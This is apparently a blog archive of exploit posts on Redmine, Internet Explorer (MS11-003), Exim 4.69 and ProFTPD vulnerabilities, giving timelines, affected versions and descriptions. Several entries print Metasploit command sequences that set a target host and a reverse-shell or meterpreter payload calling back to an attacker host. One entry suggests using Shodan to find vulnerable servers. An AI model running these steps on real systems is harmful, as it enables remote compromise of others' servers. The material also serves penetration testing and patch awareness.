Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

OSVDB-70090 : Remote Code Execution for Redmine

Timeline :

Vulnerability submitted by joernchen to Redmine the 2010-12-18
Vulnerability advisory and new package provided by Redmine the 2010-12-23
Metasploit exploit released the 2010-12-24

    PoC provided by :

joernchen

    Reference(s) :

OSVDB-70090

    Affected version(s) :

All versions of Redmine previous version 1.0.5, version 0.9.x included
redmine_1.0.4-1_all.deb on Debian Squeeze / Sid
redmine_1.0.4-1_all.deb on Ubuntu Lucid

    Tested on Ubuntu Lucid 10.04.1 LTS with :

    CVS as SCM

    Description :

joernchen has report a vulnerability, how could be classified as highly critical, for the project management web application Redmine, how could allow an attacker to compromise a vulnerable system.

The entries submitted to the “rev” parameter, from the “repository/annotate” script of a Redmine project, are not treated correctly before to be used. This error could be used to execute, remotely, arbitrary code on the vulnerable server.

The vulnerability affect principally the bazaar, cvs, darcs and mercurial SCM adapters. The code will be executed with the privileges of the user running the  project management web application Redmine (for example www-data).

The vulnerability has been confirmed for all versions previous version 1.0.5. The supplier propose an update to correct this vulnerability.

    Commands :

use exploit/unix/webapp/redmine_scm_exec
set RHOST 192.168.178.21
set URI /redmine/projects/project2/
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.178.21
exploit

id
uname -a
/sbin/ifconfig

MS11-003 : Microsoft IE CSS Use After Free – When A DoS Isn’t A DoS

Timeline :

Vulnerability discovered the 2010-11-29 by WooYun
Vulnerability disclosed the 2010-12-08 by WooYun
Vulnerability confirmed the 2010-12-09 by VUPEN Security
Vulnerability explained the 2010-12-16 by Nephi Johnson
Exploit released the 2010-12-20 by jduck

    PoC provided by :

WooYun
d0c_s4vage
Nephi Johnson
jduck

    Reference(s) :

OSVDB-69796
SA42510
SA 2488013
CVE-2010-3971
EDB-ID-15708
EDB-ID-15746
MS11-003

Affected version(s) :

Internet Explorer 8

  • Windows XP SP3, Windows XP Professional x64 SP2, Windows Server 2003 SP2, Windows Server 2003 x64 SP2, Windows Vista SP1 and Windows Vista SP2, Windows Vista x64 SP1 and Windows Vista x64 SP2, Windows Server 2008 32 and Windows Server 2008 32 SP2, Windows Server 2008 x64 and Windows Server 2008 x64 SP2, Windows 7 32, Windows 7 x64, Windows Server 2008 R2 x64

Internet Explorer 7

  • Windows XP SP3, Windows XP Professional x64 SP2, Windows Server 2003 SP2, Windows Server 2003 x64 SP2, Windows Vista SP1 and Windows Vista SP2, Windows Vista x64 SP1 and Windows Vista x64 SP2, Windows Server 2008 32 and Windows Server 2008 32 SP2, Windows Server 2008 x64 and Windows Server 2008 x64 SP2

Internet Explorer 6

  • Windows XP SP3, Windows XP Professional x64 SP2, Windows Server 2003 SP2, Windows Server 2003 x64 SP2

Tested on Windows XP SP3 with :

Internet Explorer 8 (mshtml.dll 8.0.6001.18999)

Description :

In the continuity of Internet Explorer 0day’s how are disclosed and not directly acknowledged, here is “Microsoft IE CSS Use After Free“, a new vulnerability how allow to gain complete control on a vulnerable computer.

This vulnerability has been discovered the 29 November and publicly disclosed the 10 December by WooYun a chinese company. But at this time, the vulnerability was perceived as a basic remote denial of service (DoS). The 11 December, VUPEN Security, has confirm the vulnerability but with a different analysis of the vulnerability impact. The vulnerability was no more just a DoS, but could permit remote code execution to gain control on vulnerable computers. Unfortunately Microsoft didn’t directly response to the WooYun disclosure and to the VUPEN analysis.

The 16 December, Nephi Johnson, a security researcher from BreakingPoint, has confirm the VUPEN vulnerability impact analysis, by providing a detailed analysis of the vulnerability and a PoC. We encourage you to read the Nephi Johnson article “When A DoS Isn’t A DoS“.

Enough vulnerability details where provided to permit, to the Metasploit Team, to create a PoC how is evading ASLR (Address Space Layout Randomization) and bypassing DEP (Data Execution Prevention).

The 23 December, Microsoft has finally acknowledge the vulnerability (SA2488013) and recommend to mitigate the vulnerability to install and use EMET (Enhanced Mitigation Experience Toolkit).

    Commands :

use exploit/windows/browser/ms11_003_ie_css_­import
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
ipconfig

exim 4.69 remote code execution

Timeline :

Vulnerability discovered the 2010-12-07 by Sergey Kononenko
Vulnerability confirmed the 2010-12-10 by David Woodhouse
Exploit released the 2010-12-10 by hdm & jduck
Vulnerability corrected the 2008-12-02 but neither identified as a vulnerability since 2 years ! So not ported in most OS distributions.

    PoC provided by :

Sergey Kononenko
David Woodhouse
jduck
hdm

    Reference(s) :

CVE-2010-4345
CVE-2010-4344
OSVDB-69685

    Affected version(s) :

Version before and equal to 4.69, depending on the distrib versioning

    Tested on Debian Lenny 5.0 with :

    exim4-base_4.69-9_i386.deb
    exim4-config_4.69-9_all.deb
    exim4-daemon-light_4.69-9_i386.deb
    exim4_4.69-9_all.deb

    dpkg -l | grep exim4

    Description :

Two vulnerabilities, exploited since two years, have been discovered into the Exim MTA. Sergey Kononenko, employee of a Ukrainian company, following a hack of its IT infrastructure, unwittingly discovered a vulnerability in the mail server Exim4, which was exploitable for two years!
This vulnerability has been reported, on December 7, to the Exim maintainers, and the rumor quickly spread up. It will not take more than three days for Rapid7 researchers, authors of the Metasploit pen-testing framework, to develop a valid PoC that affects most Exim installations on all platforms (Debian, Ubuntu, Red Hat, Centos, etc..).
Share the same time, not one but two vulnerabilities have been discovered. The first, CVE-2010-4344, will permit a remote arbitrary code execution with the privileges of the user invoking the Exim mail software. The second, CVE-2010-4345, for its part, allows escalation of privileges from the user invoking the Exim mail software to super user root.
It is interesting to see that the first vulnerability was corrected December 2, 2008, but this correction had not been marked as a correction of vulnerability. This lack of communication has resulted that the distributions (Debian, Ubuntu, Red Hat, CentOS, etc.) providing Exim were not warned of the vulnerability, and therefore updating of the hidden vulnerability never been done until now.

    Commands :

dpkg -l | grep exim4
tail -f /var/log/exim4/mainlog

use exploit/unix/smtp/exim4_string_format
set RHOST 192.168.178.52
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit
id

CVE-2010-3867 : You wanna play with ProFTPD ?

ZDI has discovered, the 2010-09-24, a vulnerability for ProFTPd versions between 1.3.2rc3 and 1.3.3b. This vulnerability, Telnet IAC, allow a remote attacker to execute arbitraty remote code on vulnerable installations of ProFTPD without authentication.

The 2010-11-02, ZDI and ProFTPD teams have release coordinated advisories (ZDI-10-229) and version 1.3.3c fixing the Telnet IAC remote exploit.

As always, security researchers have jump on the advisories to create valid public PoC or exploit.

Rapid7 Team, between jduck, has integrate into Metasploit, the 2010-11-04, a valid exploit targeting :

The 2010-11-07, Kingcope has release on Exploit-DB (EDB-ID-15449) a valid exploit for :

  • ProFTPD 1.3.3a on FreeBSD 8.1 i386
  • ProFTPD 1.3.2a/e/c on FreeBSD 8.0/7.3/7.2 i386
  • ProFTPD 1.3.2e (Plesk binary) on Debian GNU/Linux 5.0
  • ProFTPD 1.3.3 (Plesk binary) on Debian GNU/Linux 5.0
  • ProFTPD 1.3.2e (Plesk binary) on Debian GNU/Linux 4.0
  • ProFTPD 1.3.3a (distro binary) on Debian Linux Squeeze/sid
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 9.3
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 10.0/10.3
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 10.2
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 11.0
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux 11.1
  • ProFTPD 1.3.2e (Plesk binary) on SUSE Linux SLES 10
  • ProFTPD 1.3.2e (Plesk binary) on CentOS 5

What is interesting in the Kingcope exploit, is to see all the “Plesk binaries” impacted by the vulnerability. At least all Plesk versions between 9.5 and 10.0 included are vulnerables. Just play with Shodan and you will get a list of thousands vulnerables servers.

Here under a demonstration video of the both exploits.